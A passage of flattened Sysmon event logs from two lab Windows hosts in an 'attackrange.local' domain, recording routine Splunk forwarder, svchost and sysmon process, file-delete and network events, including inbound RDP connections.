Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6BF9830B1FF09F89E4995DC76B9DBAF,SHA256=C6BA31A48EF4F71995D9D556C94CCF8BFE5CB3A89F1E50BA5C452999E053D4F2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981257Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:32.712{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59537-false10.0.1.12-8000- 354300x8000000000000000981256Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:32.584{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54499-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981255Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:35.309{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4E09EA84AC2A5F9C3EEFD435AD9DC47,SHA256=B1D15D3CD7156F68ADA1CDA0A005BDB6B3B53298A9AD6477029C3DBFE2017139,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:35.107{5EBD8912-8D96-6151-B500-00000000FD01}52324796C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000981259Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:36.793{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F495857150E32C99E369421D4D5A9CE,SHA256=F0BE18B695A114DF3DDB33E0A96F9467063B762DA577BFC2E5951A2AD417F7D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056701Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.591{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D98-6151-B600-00000000FD01}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056700Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.591{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056699Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.591{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056698Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.591{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.591{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.591{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8D98-6151-B600-00000000FD01}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.591{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D98-6151-B600-00000000FD01}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.592{5EBD8912-8D98-6151-B600-00000000FD01}5360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001056693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:36.513{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F0FCB2176EB052F964448ED92570334,SHA256=8D1423A25E3FCA741244165B9DEEC170FA3681646D56E50A70FE825F1113FB41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056704Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:37.732{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05674D9960BFCDB18A2D6C4D8CFC4E3F,SHA256=9A05197313DF00D84609282CFD5B2BE3D60DF4C93935C6322DEFB5F06949091D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056703Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:37.529{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01591678313153890985EEA90FBD6182,SHA256=1A2FE9731F6FBCD928A82E30822192B6B56EE72974366359EBED0C078A77F869,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981273Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.809{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4A4098DF9C89EACA23BF52934406140,SHA256=0D8FAC2271EA4A9D2F10F00E13359874FD5466C73BC2821A58A56CD6FB50AA42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981272Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D99-6151-1A7A-00000000FD01}2528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981271Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981270Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981269Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981268Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981267Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981266Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981265Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981264Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981263Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8D99-6151-1A7A-00000000FD01}2528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981262Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981261Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.496{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D99-6151-1A7A-00000000FD01}2528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981260Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:37.466{69CF5F33-8D99-6151-1A7A-00000000FD01}2528C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001056702Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:23:34.344{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de54084-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000981275Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:23:38.809{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90D661BAA5E4D69BCD42A432841928DF,SHA256=95754A361336F46B9B015CBA94A4CEDCA6644A6604880B1761C6148C2AABCDA4,IMPHASH=00000000000000000000000000000000falsetrue 